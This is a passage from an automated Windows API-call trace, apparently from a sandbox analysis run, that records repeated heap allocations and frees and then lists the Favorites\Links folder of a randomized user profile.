hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0101.365] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0101.365] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0101.365] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0101.365] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0101.365] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0101.365] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0101.365] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0101.365] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0101.365] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0101.365] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0101.365] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0101.365] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0101.365] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0101.365] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0101.365] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0101.365] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0101.365] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0101.365] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0101.365] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0101.365] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x9b91b28 [0101.365] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0101.365] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0101.365] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0101.365] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0101.365] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0101.365] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0101.365] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0101.365] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0101.366] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0101.366] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x9b91b28 [0101.366] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0101.366] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0101.366] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0101.366] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0101.366] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0101.366] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0101.366] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0101.366] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0101.366] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0101.366] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0101.366] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0101.366] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0101.366] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0101.366] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0101.366] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0101.366] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0101.366] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0101.366] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0101.366] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0101.366] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0101.366] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0101.366] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x9b91b28 [0101.366] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0101.366] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0101.366] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0101.366] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0101.366] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0101.366] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0101.366] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0101.366] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0101.366] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0101.367] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0101.367] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0101.367] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0101.367] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0101.367] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0101.367] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0101.367] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0101.367] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0101.367] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0101.367] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0101.367] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0101.367] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0101.367] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0101.367] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0101.367] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0101.367] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0101.367] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0101.367] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0101.367] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0101.367] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0101.367] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0101.367] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0101.367] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0101.367] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0101.367] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0101.367] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0101.367] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0101.367] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0101.367] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0101.367] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0101.367] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0101.368] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0101.368] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x9b91b28 [0101.368] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0101.368] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0101.368] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0101.368] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0101.368] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0101.368] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0101.368] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0101.368] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0101.368] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0101.368] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0101.368] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0101.368] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0101.368] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0101.368] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0101.368] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0101.368] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0101.368] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0101.368] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0101.368] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0101.368] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0101.368] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0101.368] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0101.368] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0101.368] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0101.368] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0101.368] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x9b91b28 [0101.369] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0101.369] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0101.369] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0101.369] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0101.369] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0101.369] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0101.369] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0101.369] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0101.369] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0101.369] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0101.369] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0101.369] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0101.369] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0101.369] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0101.369] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0101.369] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0101.369] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0101.369] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0101.369] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0101.369] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0101.369] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0101.369] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0101.369] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0101.369] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0101.370] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0101.370] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0101.370] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0101.370] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0101.370] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0101.370] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0101.370] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0101.370] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0101.370] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0101.370] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0101.370] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0101.370] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0101.370] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0101.370] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0101.370] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0101.370] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0101.370] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0101.370] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x9b91b28 [0101.370] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0101.370] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0101.370] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0101.370] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0101.370] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0101.370] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0101.370] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0101.370] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0101.370] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0101.370] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0101.370] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0101.370] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0101.371] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0101.371] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0101.371] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0101.371] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0101.371] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0101.371] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0101.371] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0101.371] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0101.371] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0101.371] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0101.371] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0101.371] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0101.371] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0101.371] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x9b91b28 [0101.371] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0101.371] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0101.371] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0101.371] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0101.371] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0101.371] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0101.371] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0101.371] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0101.371] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0101.371] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0101.371] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0101.371] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0101.371] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0101.372] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0101.372] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0101.372] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0101.372] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0101.372] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0101.372] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0101.372] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0101.372] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0101.372] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0101.372] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0101.372] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0101.372] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0101.372] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0101.372] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0101.372] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0101.372] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\") returned="Links\\" [0101.372] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce270 [0101.372] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0101.372] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="Favorites\\" [0101.372] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0101.372] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9bb5db8 [0101.372] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce270 | out: hHeap=0x630000) returned 1 [0101.372] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0101.372] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317100 [0101.372] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0101.372] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0101.372] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb5db8 | out: hHeap=0x630000) returned 1 [0101.372] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0101.372] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0101.372] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0101.372] PathFindFileNameW (pszPath="") returned="" [0101.373] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce270 [0101.373] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x670618 [0101.373] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce270 | out: hHeap=0x630000) returned 1 [0101.373] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0101.373] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0101.373] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce270 [0101.373] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8e) returned 0x65e7c0 [0101.373] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce270 | out: hHeap=0x630000) returned 1 